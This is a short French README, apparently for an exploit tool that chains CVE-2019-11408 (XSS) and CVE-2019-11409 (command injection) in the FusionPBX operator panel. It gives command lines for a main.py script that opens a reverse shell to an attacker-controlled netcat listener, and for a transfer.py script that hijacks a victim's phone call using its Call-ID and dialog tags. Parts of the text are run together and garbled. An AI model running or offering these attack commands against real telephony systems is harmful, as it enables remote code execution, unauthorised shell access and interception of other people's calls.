
Enchaînement CVE-2019-11408 – XSS dans le panneau d'opérateur et CVE-2019-11409 – Injection de commande dans le panneau d'opérateur.
Ce simple code tente de compléter l'implémentation de la vulnérabilité en chaîne introduite par Dustin Cobb dans RCE via l'identifiant de l'appelant – Multiples vulnérabilités dans FusionPBX.
netcat sur un système distant (rce_listener_address).x`python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat et fournira un reverse shellAlors que nous connaissons le Call-ID, from-tag et to-tag d'un appel, l'exécution du code ci-dessous vous remplacera à la place de la victime dans l'appel.
python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}